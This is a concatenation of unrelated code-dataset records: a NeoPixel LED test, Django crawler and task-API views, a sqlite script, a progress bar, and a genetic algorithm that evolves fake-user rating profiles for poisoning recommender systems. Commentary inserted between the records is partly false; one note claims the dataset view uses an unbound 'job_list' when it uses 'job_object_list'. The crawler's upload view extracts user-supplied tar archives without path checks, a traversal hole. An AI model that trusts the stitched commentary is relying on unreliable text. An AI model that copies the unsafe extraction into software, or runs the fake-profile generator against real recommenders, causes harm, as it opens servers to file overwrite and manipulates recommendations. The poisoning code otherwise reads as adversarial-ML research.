0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n \n\t#run an animation with python script\n\t#turn off all the pixels\n\tfor pixel in range (1,neopixel.numPixel + 1):\n \t\tneopixel.setPixel(pixel, 0, 0, 0) #setPixel(pixel, red, green, blue)\n\tneopixel.writeMatrix() #send the pixel data to the Neopixel hardware \n\n\tfor loop in range(0,10): #do 10 loop\n\t \tfor pixel in range(1, neopixel.numPixel +1):\n \t\t\tneopixel.setPixel(pixel, 255, 0, 0) #set the pixel to red \n \t\t\tneopixel.writeMatrix()\n \t\t\tsleep(0.03) #give a bit of delay before next step\n \t\t\tneopixel.setPixel(pixel, 0, 0, 0) #turn off the pixel\n\tneopixel.writeMatrix()\n\n\tfor pixel in range (1,neopixel.numPixel + 1):\n \t\tneopixel.setPixel(pixel, 0, 0, 0) #setPixel(pixel, red, green, blue)\n\tneopixel.writeMatrix() #send the pixel data to the Neopixel hardware \n\n\tfor loop in range(0,10): #do 10 loop\n \t\tfor pixel in range(1, neopixel.numPixel +1):\n \t\t\tneopixel.setPixel(pixel, 0, 255, 0) #set the pixel to green \n \t\t\tneopixel.writeMatrix()\n \t\t\tsleep(0.03) #give a bit of delay before next step\n \t\t\tneopixel.setPixel(pixel, 0, 0, 0) #turn off the pixel\n\tneopixel.writeMatrix()\n\n\tfor pixel in range (1,neopixel.numPixel + 1):\n \t\tneopixel.setPixel(pixel, 0, 0, 0) #setPixel(pixel, red, green, blue)\n\tneopixel.writeMatrix() #send the pixel data to the Neopixel hardware \n\n\n\tfor loop in range(0,10): #do 10 loop\n \t\tfor pixel in range(1, neopixel.numPixel +1):\n\t \t\tneopixel.setPixel(pixel, 0, 0, 255) #set the pixel to blue \n \t\t\tneopixel.writeMatrix()\n \t\t\tsleep(0.03) #give a bit of delay before next step\n \t\t\tneopixel.setPixel(pixel, 0, 0, 0) #turn off the pixel\n\tneopixel.writeMatrix()\n\nfor loop in range(0,5):\n\tprint (\"loop \"+str(loop))\n\tlightupthering()\n","sub_path":"home/hairygael/NeoPixelTest.py","file_name":"NeoPixelTest.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
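The per-pixel loops above generalize into a small helper. A sketch reusing the same MRL calls already bound to neopixel (setPixel, writeMatrix, numPixel):

def fill_ring(red, green, blue):
	# paint every pixel one color, then push the whole frame at once
	for pixel in range(1, neopixel.numPixel + 1):
		neopixel.setPixel(pixel, red, green, blue)
	neopixel.writeMatrix()

fill_ring(0, 0, 0)  # blank the ring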
+{"seq_id":"70327526","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import *\nfrom .forms import *\nfrom django.views import generic\nfrom django.urls import reverse\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom crawlerapp.tasks import *\nfrom crawlerapp.filters import *\nimport jsonpickle, io, ast, csv, os, json, random, datetime\nfrom crawlerapp.definitions import *\nfrom crawlerapp.utils import job_update, get_celery_worker_status\nfrom django.utils import timezone\nimport tarfile,re\n\ndef home(request):\n return render(request, 'crawlerapp/landing.html')\n\ndef mobile(request):\n return render(request, 'crawlerapp/mobile.html')\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef all(request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/accounts/login/')\n jobs = Job.objects.order_by('-id')\n context = {'jobs': jobs}\n return render(request,'crawlerapp/all.html',context)\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef dataset_all(request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/accounts/login/')\n\n datasets = Dataset.objects.order_by('-id')\n context = {'datasets': datasets}\n\n return render(request,'crawlerapp/dataset_all.html',context)\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef detail(request, job_id):\n context = job_update(job_id)\n filters = context[\"filters\"]\n if request.method == \"POST\":\n form = DownloadForm(request.POST)\n if request.POST.get(\"filter\"):\n job = Job.objects.filter(id=job_id).get()\n\n filter_name = str(request.POST.get(\"filter\"))\n filter_obj = filters[filter_name][\"filter_obj\"]\n filters[filter_obj.name()][\"enabled\"] = False\n\n job.filters[filter_name] = \"Active\"\n job.save()\n\n filter_async.delay(jsonpickle.encode(filter_obj), job_id)\n elif request.POST.get(\"remove\"):\n filter_name = str(request.POST.get(\"remove\"))\n filter_obj = filters[filter_name][\"filter_obj\"]\n #Dont clear the filters asynchronously\n clear_filter_async(jsonpickle.encode(filter_obj), job_id)\n elif request.POST.get(\"delete_job\"):\n job = Job.objects.filter(id=job_id).get()\n job.deleteJob()\n return redirect('all')\n elif request.POST.get(\"restart_crawl\"):\n #Refresh job\n job = Job.objects.filter(id=job_id).get()\n job.executed = False\n job.download_finished = False\n job.work_status = \"Restarting crawl...\"\n job.save()\n crawl_async.delay(job.id)\n\n return redirect('detail', job_id)\n else:\n form = DownloadForm()\n context['form'] = form\n return render(request, 'crawlerapp/detail.html', context)\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef view_videos(request, job_id):\n face_detected = {}\n job = Job.objects.filter(id=job_id).get()\n for vid in job.videos:\n vid_query = Video.objects.filter(id=vid).get()\n if \"Face Detection\" in vid_query.filters:\n if vid_query.filters['Face Detection']:\n face_detected[vid] = vid_query\n context = {\n 'face_detected': face_detected\n }\n return render(request,'crawlerapp/view_videos.html',context)\n\n\ndef newcsv(data, csvheader, fieldnames):\n \"\"\"\n Create a new csv file that represents generated data.\n \"\"\"\n 
csvrow = []\n    new_csvfile = io.StringIO()\n    wr = csv.writer(new_csvfile, quoting=csv.QUOTE_ALL)\n    wr.writerow([csvheader])\n    wr = csv.DictWriter(new_csvfile, fieldnames = fieldnames)\n\n    for job in data:\n        wr.writerow(job.videos)\n\n    return new_csvfile\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef dataset_detail(request, dataset_id):\n    try:\n        dataset = Dataset.objects.filter(id=dataset_id).get()\n    except:\n        return render(request, 'crawlerapp/datasetnotfound.html', {'datasetid': dataset_id})\n    #get list of jobs\n    video_sum = 0\n    job_object_list = []\n    for job_id in dataset.jobs_list:\n        job = Job.objects.filter(id=job_id).get()\n        job_object_list.append(job)\n        for vid in job.videos:\n            vid_query = Video.objects.filter(id=vid).get()\n            if vid_query.download_success:\n                video_sum += 1\n    context = {'dataset_name': dataset.name,\n               'dataset_num_vids': video_sum,\n               'dataset_num_jobs': len(dataset.jobs_list),\n               'dataset_created_date': dataset.created_date,\n               'dataset_user_id': dataset.user_id,\n               'dataset_id': dataset.id,\n               'dataset_jobs': job_object_list}\n    if request.method == \"POST\":\n        if request.POST.get(\"submit_jobs\"):\n            form = ChangeDatasetJobs(request.user,dataset,request.POST)\n            if form.is_valid():\n                dataset.jobs_list = form.cleaned_data['jobs_list']\n                dataset.save()\n                return redirect('dataset-detail', dataset.id)\n        elif request.POST.get(\"download\"):\n            # Create the HttpResponse object with the appropriate CSV header.\n            #redir_url = 'crawlerapp/dataset/' + str(dataset.id)\n            #response = HttpResponseRedirect('',content_type='text/csv')\n            response = HttpResponse(content_type='text/csv')\n            response['Content-Disposition'] = 'attachment; filename=' + dataset.name + '.csv'\n            fieldnames = ['job_id', 'job_name', 'query', 'video_ids']\n            writer = csv.DictWriter(response, fieldnames = fieldnames)\n            for job in job_object_list:\n                writer.writerow({'job_id': job.id, 'job_name': job.name, 'query': job.query, 'video_ids': job.videos})\n            return response\n        elif request.POST.get(\"download_hdf5\"):\n            p2fa_list = []\n            for job_id in dataset.jobs_list:\n                job = Job.objects.filter(id=job_id).get()\n                for vid in job.videos:\n                    vid_query = Video.objects.filter(id=vid).get()\n                    if 'P2FA Align Video' in vid_query.filters:\n                        if vid_query.filters['P2FA Align Video']:\n                            p2fa_list.append(vid_query.id)\n            collect.delay(p2fa_list,dataset.id)\n            return redirect('dataset-detail', dataset.id)\n\n    else:\n        form = ChangeDatasetJobs(request.user,dataset)\n        context['form'] = form\n    return render(request, 'crawlerapp/dataset_detail.html', context)\n\n\ndef index(request):\n    if not (request.user.is_authenticated):\n        return HttpResponseRedirect('/accounts/login/')\n    jobs = Job.objects.all()\n    context = {'jobs': jobs}\n    return render(request, 'crawlerapp/index.html', context)\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef job_create(request):\n    if not (request.user.is_authenticated):\n        return HttpResponseRedirect('/accounts/login/')\n    if request.method == \"POST\":\n        form = CreateJobForm(request.POST)\n        if form.is_valid():\n            job = Job()\n            job.language = form.cleaned_data['language']\n            job.region = form.cleaned_data['region']\n            job.name = form.cleaned_data['name']\n            job.channel_id = form.cleaned_data['channel_id']\n            job.query = form.cleaned_data['query']\n            job.ordering = form.cleaned_data['ordering']\n            job.safe_search = form.cleaned_data['safe_search']\n            job.cc_enabled = form.cleaned_data['cc']\n            job.video_def = form.cleaned_data['video_def']\n            
job.video_duration = form.cleaned_data['video_duration']\n job.created_date = timezone.now()\n job.num_pages = form.cleaned_data['num_vids']\n job.num_vids = 0\n job.user_id = request.user.username\n job.save()\n crawl_async.delay(str(job.id))\n return redirect('detail', job.id)\n else:\n form = CreateJobForm()\n\n return render(request, 'crawlerapp/job_create.html', {'form': form})\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef dataset_create(request):\n if not (request.user.is_authenticated):\n return HttpResponseRedirect('/accounts/login/')\n if request.method == \"POST\":\n form = CreateDatasetForm(request.user,request.POST)\n if form.is_valid():\n dataset = Dataset()\n dataset.jobs_list = list(form.cleaned_data['jobs_list'])\n dataset.name = form.cleaned_data['name']\n dataset.description = form.cleaned_data['description']\n dataset.created_date = timezone.now()\n dataset.user_id = request.user.username\n dataset.save()\n return redirect('dataset-detail', dataset.id)\n else:\n form = CreateDatasetForm(request.user)\n\n return render(request, 'crawlerapp/dataset_create.html', {'form': form})\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect(home)\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n jobs = Job.objects.filter(user_id=request.user.username)\n datasets = Dataset.objects.filter(user_id=request.user.username)\n context = {'jobs': jobs, 'datasets': datasets, 'user': request.user}\n return render(request, 'crawlerapp/profile.html', context)\n\n\ndef updateProgress(request, job_id):\n #Can't encode filter object as json, have to get rid of it\n context = job_update(job_id)\n filters = context[\"filters\"]\n for filter_name,filter_dict in filters.items():\n filter_dict[\"filter_obj\"] = None\n\n\n return HttpResponse(json.dumps(context), content_type='application/json')\n\n@login_required\ndef celery_status(request):\n d = get_celery_worker_status()\n context = {'celery_status': d}\n return render(request, 'crawlerapp/celery_status.html', context)\n\n@login_required\ndef upload(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n fname = request.FILES['document'].name\n if (form.is_valid() and fname.endswith(\"tar\")):\n doc = form.save()\n with tarfile.open(str(doc.document), \"r\") as tar:\n all_dirs = [f for f in tar.getmembers() if f.isdir() and f.name.count(\"/\") == 0]\n for member in all_dirs:\n #Check if we've gotten this video already\n found = Video.objects.filter(id=str(member.name)).count()\n if (found > 0):\n print(\"Already have \" + str(member.name))\n else:\n reg_vtt = re.compile(\".*.vtt\")\n #If not, check to make sure it's properly formatted\n all_relevant_files = [f.name for f in tar.getmembers() if f.name.startswith(member.name)]\n has_mp4 = (member.name + \"/\" + member.name + \".mp4\" in all_relevant_files)\n has_wav = (member.name + \"/\" + member.name + \".wav\" in all_relevant_files)\n vtts = list(filter(reg_vtt.match,all_relevant_files))\n try:\n lang = vtts[0].split(\".\")[1]\n except Exception as e:\n #Couldn't find a language...\n continue\n has_frames = (member.name + \"/Frames\" in 
all_relevant_files)\n has_align = (member.name + \"/AlignFilter\" in all_relevant_files)\n if (has_mp4 and has_wav):\n video = Video(id=str(member.name))\n video.cc_enabled = True\n video.language = lang\n video.search_time = timezone.now()\n video.audio_extracted = has_wav\n video.download_success = True\n video.download_time = timezone.now()\n video.download_path = os.path.join(CRAWLED_VIDEOS_DIR, member.name)\n if has_frames:\n video.filters['Extract Frames'] = True\n if has_align:\n video.filters['P2FA Align Video'] = True\n video.save()\n tar.extractall(path=CRAWLED_VIDEOS_DIR,members=[f for f in tar.getmembers() if f.name.startswith(member.name)])\n\n\n return redirect('home')\n else:\n form = DocumentForm()\n return render(request, 'crawlerapp/upload.html', {\n 'form': form\n })\n","sub_path":"crawlerapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
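The `newcsv` helper above hands list values (`job.videos`) to a `csv.DictWriter`, which expects mappings, and never calls `writeheader()`; the CSV branch of `dataset_detail` also iterates over `job_list`, a name that is never bound in that view (the list built earlier is `job_object_list`). Below is a minimal sketch of a working export, assuming job-like objects with the same `id`, `name`, `query`, and `videos` attributes the view uses; the `Job` namedtuple is a hypothetical stand-in for the Django model.

```python
import csv
import io
from collections import namedtuple

def jobs_to_csv(jobs):
    """Serialize job-like objects into the CSV layout dataset_detail advertises."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=["job_id", "job_name", "query", "video_ids"])
    writer.writeheader()  # DictWriter does not emit a header row on its own
    for job in jobs:
        writer.writerow({
            "job_id": job.id,
            "job_name": job.name,
            "query": job.query,
            "video_ids": ";".join(map(str, job.videos)),
        })
    return buf.getvalue()

Job = namedtuple("Job", "id name query videos")  # stand-in for the model above
print(jobs_to_csv([Job(1, "demo", "cats", ["a1", "b2"])]))
```

The same `writerow` dicts could be handed to the `HttpResponse`-backed writer in the view once the loop variable is corrected.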
+{"seq_id":"583904688","text":"from django.views.generic import View\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\n\nfrom apps.dashboard.models import *\nfrom apps.api.v1.tasks.serializers import *\n \nfrom datetime import datetime, timedelta\nfrom django.db.models import Q\n\n# Class based view for alerts\nclass APITasks(APIView):\n # this will be executed ONLY on GET request.\n def get(self, request, format=None):\n\n try:\n\n # need to get logged in user.\n user_profile = request.user.core_user_profile\n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0).order_by('-date_due')\n tasks_data = TaskSerializer(tasks, context={'request': request})\n \n except:\n \n tasks = None \n tasks_data = TaskSerializer(tasks)\n\n tzCode = get_user_timezone_code(request.user)\n \n # finalizing our output content.\n content = {\n # this node will have all organization related data\n 'tasks': tasks_data.data, \n 'tzCode': tzCode,\n 'user': request.user.id\n }\n\n # sending final response.\n return Response(content)\n \n def post(self, request, format=None):\n \n method = self.request.DATA.get('method', None)\n task_id = self.request.DATA.get('task_id', None)\n completed = self.request.DATA.get('completed', None) \n description = self.request.DATA.get('description', None)\n due_date = self.request.DATA.get('due_date', None)\n \n if method == 'add':\n if due_date is not None and due_date != '':\n due_datetime = datetime.strptime(due_date, '%m/%d/%Y')\n task = CoreTasks.objects.create(user=request.user,\n tasks_description=description,\n date_added=datetime.now(),\n date_due=due_datetime,\n assigned_by_user=request.user,\n user_ip_address=get_client_ip(request), \n )\n else:\n due_datetime = None\n task = CoreTasks.objects.create(user=request.user,\n tasks_description=description,\n date_added=datetime.now(),\n user_ip_address=get_client_ip(request), \n ) \n \n task.save()\n task_data = TaskSerializer(task, context={'request': request})\n content = { # sending success response\n 'status': 'success', \n 'task': task_data.data,\n }\n \n elif method == 'change':\n if task_id is not None:\n try:\n task = CoreTasks.objects.get(id=int(task_id))\n if description is not None:\n task.tasks_description = description\n if completed is not None:\n if completed is True:\n task.date_completed = datetime.now()\n elif completed is False:\n task.date_completed = None\n if due_date is not None:\n task.date_due = convert_timezone_reverse(datetime.strptime(due_date, '%m/%d/%Y'), request.user) \n \n task.save()\n task_data = TaskSerializer(task, context={'request': request})\n response = response_profile_save_successful()\n # if there's any exception then just send None data.\n except:\n \n response = response_profile_save_successful()\n \n raise ExceptionUnknownError(detail=response)\n \n # finalizing our output content.\n content = { # sending success response\n 'status': 'success',\n 'response': response,\n 'task': task_data.data,\n }\n elif method == 'delete':\n if task_id is not None:\n try:\n task = CoreTasks.objects.get(id=int(task_id))\n task.date_deativated = datetime.now()\n task.deactivateduser = request.user\n task.save()\n except:\n raise ExceptionUnknownError(detail=response)\n \n content = {'status': 'success',\n 'response': 'Tasks is deactivated'\n }\n \n elif method == 'clear_all_completed':\n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, 
task_cleared_id=0).exclude(date_completed=None)\n for task in tasks:\n task.task_cleared_id = 1\n task.save()\n \n content = {'status': 'success',\n 'response': 'All completed tasks is cleared'\n }\n \n \n elif method == 'mark_all_as_done': \n if completed is not None: \n if completed is True: \n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0, date_completed=None)\n for task in tasks:\n task.date_completed = datetime.now()\n task.save()\n else:\n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0)\n for task in tasks:\n task.date_completed = None\n task.save()\n \n content = {'status': 'success',\n 'response': 'All completed marked as done!'\n } \n else:\n content = {'status': 'fail',\n 'response': 'Alert ID should be defined!'\n }\n \n # sending final response.\n return Response(content)","sub_path":"apps/api/v1/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
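`APITasks.post` above parses `due_date` with `datetime.strptime(due_date, '%m/%d/%Y')` in two branches and leans on bare `except` blocks when anything fails. A small sketch, assuming the same `%m/%d/%Y` wire format, that isolates the parsing and fails soft instead of masking unrelated errors:

```python
from datetime import datetime

def parse_due_date(raw, fmt="%m/%d/%Y"):
    """Return a datetime for the due_date field, or None when the value
    is absent, empty, or malformed."""
    if not raw:
        return None
    try:
        return datetime.strptime(raw, fmt)
    except ValueError:
        return None

assert parse_due_date("12/31/2024").year == 2024
assert parse_due_date("") is None
assert parse_due_date("2024-12-31") is None  # wrong format, handled quietly
```

Returning `None` keeps the existing `date_due=None` code path usable without a blanket `except` around the whole branch.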
+{"seq_id":"320588788","text":"import sqlite3\nimport csv\n\nwith sqlite3.connect(\"new.db\") as connection:\n\n c = connection.cursor()\n\n cities = [\n ('Boston', 'MA', 600000),\n ('Chicago','IN', 27000000),\n ('Houston', 'TX', 21000000),\n ('Phoenix', 'AZ', 15000000)\n ]\n c.executemany('INSERT INTO population VALUES(?,?,?)', cities)\n\nwith sqlite3.connect(\"new.db\") as connection:\n c = connection.cursor()\n employees = csv.reader(open('employees.csv', 'rU'))\n c.execute(\"DROP TABLE employees\")\n c.execute(\"CREATE TABLE employees (firstname TEXT, lastname TEXT)\")\n c.executemany(\"INSERT INTO employees(firstname, lastname) values (?,?)\", employees)\n","sub_path":"02_sql.py","file_name":"02_sql.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"316358404","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nclass ProgressBar:\r\n\tdef __init__(self, min = 0, max = 100, width = 60, charset = '[=]'):\r\n\t\tself.min = min\r\n\t\tself.max = max\r\n\t\tself.width = width\r\n\t\tself.current = min\r\n\t\tself.percent = 0.0\r\n\t\tself.int_percent = 0\r\n\r\n\t\tif len(charset) != 3: charset = '[=]'\r\n\t\tself.charset = charset\r\n\r\n\t\tself.bar = ''\r\n\t\tself.used = -1\r\n\t\tself.int_percent_change = False\r\n\r\n\tdef update(self, current):\r\n\t\tself.current = current\r\n\t\tself.percent = (float(self.current-self.min)/(self.max-self.min))*100.0\r\n\t\tint_percent = int(self.percent)\r\n\r\n\t\tif int_percent != self.int_percent:\r\n\t\t\tself.int_percent_change = True\r\n\t\tself.int_percent = int_percent\r\n\r\n\t\tself.__generate_bar__()\r\n\r\n\t\tif self.int_percent_change:\r\n\t\t\tself.int_percent_change = False\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\tdef __str__(self):\r\n\t\treturn self.bar\r\n\r\n\tdef __generate_bar__(self):\r\n\t\tself.used = int((float(self.current-self.min)/(self.max-self.min)) * (self.width-6))\r\n\t\t#if new_used != self.used:\r\n\t\t#\tself.used = new_used\r\n\t\t#\tself.bar_change = True\r\n\r\n\t\tcenter = self.charset[1] * self.used\r\n\t\t#center = center.ljust(self.width-2)\r\n\t\t#center = center[:(self.width-2)/2-2] + str(int(self.percent)) + '%' + center[(self.width-2)/2+2:]\r\n\t\tself.bar = self.charset[0] + center + self.charset[2] + \" \" + str(self.int_percent) + '%' + '\\r'\r\n\r\ndef main():\r\n\tpass\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"P2/ProgressBar.py","file_name":"ProgressBar.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"340208941","text":"import numpy as np\nimport uuid\n\n\nclass AttackAgent:\n def __init__(self, n_m_users=0, n_items=0, gnome=None, d_birth=0, POS_RATIO=1, BINARY = True):\n if gnome is not None and ( n_items != 0 or n_items != 0 or d_birth == 0 or POS_RATIO != 1):\n raise ValueError('not valid config')\n self.fitness = .0\n # self.is_fame = False\n self.evaluted = False\n self.d_birth = d_birth\n # changing params through generations\n self.age = 0 # at what generation this agent created?\n self.generations_mutated = 0\n self.id = uuid.uuid4().hex[:8]\n # initiate or create one from given gnome (offspring)\n if gnome is None:\n if BINARY:\n self.gnome = np.random.choice([0, 1],\n size=(n_m_users, n_items),\n p=[1 - POS_RATIO, POS_RATIO])\n else:\n self.gnome = np.random.choice(list(range(6)),\n size=(n_m_users, n_items),\n p=[1-POS_RATIO, POS_RATIO / 5, POS_RATIO / 5, POS_RATIO / 5, POS_RATIO / 5, POS_RATIO / 5])\n else:\n self.gnome = gnome\n\nclass FakeUserGeneticAlgorithm:\n def __init__(self, POP_SIZE, N_GENERATIONS, GENERATIONS_BEFORE_REMOVAL, REMOVE_PERCENTILE, MUTATE_USER_PROB, MUTATE_BIT_PROB, BINARY, POS_RATIO):\n self.POP_SIZE = POP_SIZE\n self.N_GENERATIONS = N_GENERATIONS\n self.GENERATIONS_BEFORE_REMOVAL = GENERATIONS_BEFORE_REMOVAL\n self.REMOVE_PERCENTILE = REMOVE_PERCENTILE\n self.MUTATE_USER_PROB = MUTATE_USER_PROB\n self.MUTATE_BIT_PROB = MUTATE_BIT_PROB\n self.BINARY = BINARY\n self.POS_RATIO = POS_RATIO\n\n def init_agents(self, n_m_users, n_items):\n return [AttackAgent(n_m_users, n_items, POS_RATIO=self.POS_RATIO, BINARY=self.BINARY) for _ in range(self.POP_SIZE)]\n\n\n def fitness(self, agents):\n\n for agent in agents:\n if not agent.evaluted:\n agent.fitness = sum(sum(agent.gnome))\n # train model with this new malicious data\n # eval model\n # continue training until there is no improvment\n # take best model, calulate difference in best model and pert_best model\n # return it as fitness\n return agents\n\n \"\"\"\n Sorts the pool, removes old indviduals that are over GENERATIONS_BEFORE_REMOVAL and are worse than REMOVE_PERCENTILE in score\n \"\"\"\n\n # TODO: there is a case where the pool can get too large, think about it.\n def selection(self, agents):\n # update age\n for agent in agents:\n agent.age += 1\n # sort by fitness best to worse\n agents = sorted(agents, key=lambda x: x.fitness, reverse=True)\n # get 5% worst\n fitness_treshold = agents[int((1-self.REMOVE_PERCENTILE) * len(agents))].fitness\n # agents_removed_worst = [a for a in agents if a.fitness > fitness_treshold and curr_generation - a.d_birth < GENERATIONS_BEFORE_REMOVAL]\n\n remove_func = lambda x: x.age < self.GENERATIONS_BEFORE_REMOVAL or x.fitness < fitness_treshold\n\n agents_removed_worst = list(filter(remove_func, agents))\n return agents_removed_worst\n\n # sort by fitness, take 2 best agents\n # keep best one in pool\n\n # TODO: Extend cross-over between pairs\n def crossover(self, agents, cur_generation):\n # Simple Cross-over between 2 agents, creates 2 offsprings.\n # or even create cross between multiple agents\n # Improve this to have a tournement like.\n agent_1_part_prefix = agents[0].gnome[:agents[0].gnome.shape[0]//2]\n agent_1_part_postfix = agents[0].gnome[agents[0].gnome.shape[0] // 2:]\n agent_2_part_prefix = agents[1].gnome[:agents[1].gnome.shape[0]//2]\n agent_2_part_postfix = agents[1].gnome[agents[1].gnome.shape[0] // 2:]\n offspring_1 = np.concatenate([agent_1_part_prefix, agent_2_part_postfix])\n offspring_2 = np.concatenate([agent_2_part_prefix, 
agent_1_part_postfix])\n offspring_1 = AttackAgent(gnome=offspring_1, d_birth= cur_generation)\n offspring_2 = AttackAgent(gnome=offspring_2, d_birth= cur_generation)\n\n # add offsprints and remove worst\n agents.append(offspring_1)\n agents.append(offspring_2)\n return agents\n # return offspring_1, offspring_2\n\n # Make 2 offsprings from 2 best agents\n # the cross over will take bunch of users from each attack, and mix them up together,\n # the cross over will not change the ratings themselvs, only the rows.\n# # make also with the hall of fame\n\n\n\n def mutation(self, agents):\n # mutation utility functions\n def bit_flip_func_binary(x):\n # bits = [1, 0]\n if np.random.rand() < self.MUTATE_BIT_PROB:\n if x == 0:\n return 1\n else:\n return 0\n else:\n return x\n\n def bit_flip_func_non_binary(x):\n if np.random.rand() < self.MUTATE_BIT_PROB:\n return np.random.randint(1, 6)\n else:\n return x\n\n def flip_bit_1d_array(arr):\n if self.BINARY:\n return list(map(bit_flip_func_binary, arr))\n else:\n return list(map(bit_flip_func_non_binary, arr))\n for agent in agents:\n if np.random.rand() < self.MUTATE_USER_PROB:\n agent.gnome = np.apply_along_axis(func1d=flip_bit_1d_array, axis=0, arr=agent.gnome)\n agent.generations_mutated += 1\n # flip bit in an entry in a prob\n # this will work on every entry, to create stohastic behaviour, kind of epsilon greedy method.\n return agents\n\n def get_stats(self, agents):\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness for ind in agents]\n\n length = len(agents)\n mean = sum(fits) / length\n sum2 = sum(x * x for x in fits)\n std = abs(sum2 / length - mean ** 2) ** 0.5\n return length, min(fits), max(fits), mean, std\n # print(f\"G:{cur_generation}\\tp_size:{length}\\tmin:{min(fits):.2f}\\tmax:{max(fits):.2f}\\tavg:{mean:.2f}\\tstd:{std:.2f}\")\n # print(f\"Best agent index: {np.argmax(fits)}\")\n\n# TODO: When called from outside, still these parameters are used, need to find a way to change these\n# TODO: need those parameters from lambda functions.\n\n\n\n\ndef main():\n # HYPER-PARAMETERS\n POP_SIZE = 100\n N_GENERATIONS = 1000\n # Mutation\n MUTATE_USER_PROB = 0.2 # prob for choosing an individual\n MUTATE_BIT_PROB = 0.01 # prob for flipping a bit\n # Selection\n GENERATIONS_BEFORE_REMOVAL = 50\n REMOVE_PERCENTILE = 0.05 # remove only worst 5%\n\n # Model / Dataset related\n N_FAKE_USERS = 9\n N_ITEMS = 7\n BINARY = False # binary or non binary data\n POS_RATIO = 0.1 # Ratio pos/ neg ratio one percent from each user\n\n print(AttackAgent(N_FAKE_USERS, N_ITEMS).gnome)\n ga = FakeUserGeneticAlgorithm(POP_SIZE, N_GENERATIONS, GENERATIONS_BEFORE_REMOVAL, REMOVE_PERCENTILE, MUTATE_USER_PROB, MUTATE_BIT_PROB, BINARY, POS_RATIO)\n\n agents = ga.init_agents(N_FAKE_USERS, N_ITEMS)\n\n print('created n_agents', len(agents))\n ga.print_stats(agents, 0)\n for cur_generation in range(1, N_GENERATIONS):\n agents = ga.fitness(agents)\n if cur_generation % 50 == 0:\n ga.print_stats(agents , cur_generation)\n\n agents = ga.selection(agents)\n agents = ga.crossover(agents, cur_generation)\n agents = ga.mutation(agents)\n\n\n\n\n\n\n\n# pop = [agent for agent in ]\n\nif __name__ == '__main__':\n main()","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
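The crossover above swaps the top and bottom halves of two parents' fake-user matrices at a fixed midpoint. A standalone check of that row-swap logic is below; note also that the demo `main()` calls `ga.print_stats`, which matches no method on the class — `get_stats` returns the tuple such a printer would need.

```python
import numpy as np

def one_point_crossover(gnome_a, gnome_b):
    # Midpoint row swap, mirroring FakeUserGeneticAlgorithm.crossover
    cut = gnome_a.shape[0] // 2
    child_1 = np.concatenate([gnome_a[:cut], gnome_b[cut:]])
    child_2 = np.concatenate([gnome_b[:cut], gnome_a[cut:]])
    return child_1, child_2

a = np.zeros((4, 3), dtype=int)
b = np.ones((4, 3), dtype=int)
c1, c2 = one_point_crossover(a, b)
assert c1[:2].sum() == 0 and c1[2:].sum() == 6  # top rows from a, bottom from b
assert c2[:2].sum() == 6 and c2[2:].sum() == 0
```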
